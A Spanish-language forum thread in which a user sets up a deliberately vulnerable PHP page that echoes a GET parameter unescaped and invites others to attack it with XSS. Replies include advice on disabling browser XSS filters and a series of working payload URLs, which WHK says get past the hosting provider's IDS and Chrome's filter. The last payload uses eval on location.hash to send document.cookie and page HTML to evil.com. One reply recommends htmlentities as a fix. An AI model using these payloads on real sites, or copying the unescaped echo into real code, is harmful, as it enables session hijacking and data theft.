XSS host protect

[patilanz]

Hola es posible que tu hosting te proteja de ataques XSS porque estoy utilizando hostinger.es y me hice una pagina de prueba en plan:

Código (php) [Seleccionar] Expandir

Hola <?php echo $_GET['name'];?>
Pero al poner pagina?hola = <script>alert()</script>
Me muestra que la pagina no existe error 404.
También probé métodos de https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet pero no consigo con ninguno. 
El background:url(javscript... todavía funciona?

Saludos

[#!drvy]

Es posible pero antes asegurate de otras cosas.

Pero al poner pagina?hola = <script>alert()</script>

¿ Pones pagina?hola= o pagina.php?hola= ? Si es el primer caso, tienes alguna regla tipo mod_rewrite que haga de router ?

También ten en cuenta que algunos navegadores (safari,chrome,ie...) tienen filtros anti-xss por defecto. Tienes que mandar un header() para que los desactiven.

Código (php) [Seleccionar] Expandir

header('X-XSS-Protection: 0');

Saludos

[patilanz]

He desactivado el filtro de chrome antes usaba firefox con tor o ie con el filtro desactivado.
Mi pagina es pagina.php?name=...
He cambiado el archivo un poco:

Código (php) [Seleccionar] Expandir

Hola <a href=" <?php echo $_GET['name'];?> " /><?php echo $_GET['name'];?></a>

Luego con esto http://pruebasdephp.hol.es/XSS_test.php?name=javascript:location.href=%27http://www.google.es%27

Consigo redireccionar hacia google. Luego intente con 'http://www.google.es?a='+document.cookie" pero no me muestra el +

La alerta tampoco consigo poner la

[daryo]

usa htmlentities
http://www.w3schools.com/php/func_string_htmlentities.asp

Código (php) [Seleccionar] Expandir

<?php echo htmlentities($_GET['name']);?>

[patilanz]

Lo que quiero no es defender me si no lo contrario. Voy a poner la pagina si alguien consigue hacer una alerta o cookies o cualquier otra cosa con XSS y luego si me puede ensenar como lo ha hecho 

http://pruebasdephp.hol.es/XSS_test.php

Saludos

[daryo]

a en firefox y opera me funciona:

http://pruebasdephp.hol.es/XSS_test.php?name=%3C/a%3E%3Cimg%20src=/%20onerror=%22location.href=%27http://www.google.es%27%22%3E%3C/img%3E

lo que vendria a significar:

Código [Seleccionar] Expandir

http://pruebasdephp.hol.es/XSS_test.php?name=</a><img src=/ onerror="location.href='http://www.google.es'"></img>

no recuerdo muy bien pero los xss de chrome son diferentes

[WHK]

Buscas algo así?

http://pruebasdephp.hol.es/XSS_test.php?name=x"><img onerror="a=alert;a('XSS by WHK')" src="x

El ids (sistema de detección de intrusos) de hol.es es bastante malo, usan listas negras bastantes pobres, puedes bbypasear los filtros de muchas maneras. Bypasear el filtro de google chrome es un poco mas difícil pero también tiene sus formas de hacerlo.

Edito:

Aqui tienes un XSS que bypasea el filtro de hol.es y el de Google Chrome 38.0 y funciona en todos los navegadores a la fecha con o sin filtro:

http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror="a=alert;a(0911)

Realmente crees que los filtros son suficientes para detener un ataque?, yo creo que no.

Acá hay otro XSS compatible con hol.es y google chrome:

http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror=";a=alert;a(location.hash.substr(1))#XSS by WHK

Acá un XSS mas peligroso compatible con todos los navegadores con filtros anti xss y hosteado en hol.es:

http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror=";a=eval;a(location.hash.substr(1))#document.location="http://evil.com/?recibe=" + escape(document.cookie) + ': ' + escape(document.body.innerHTML);

Saludos.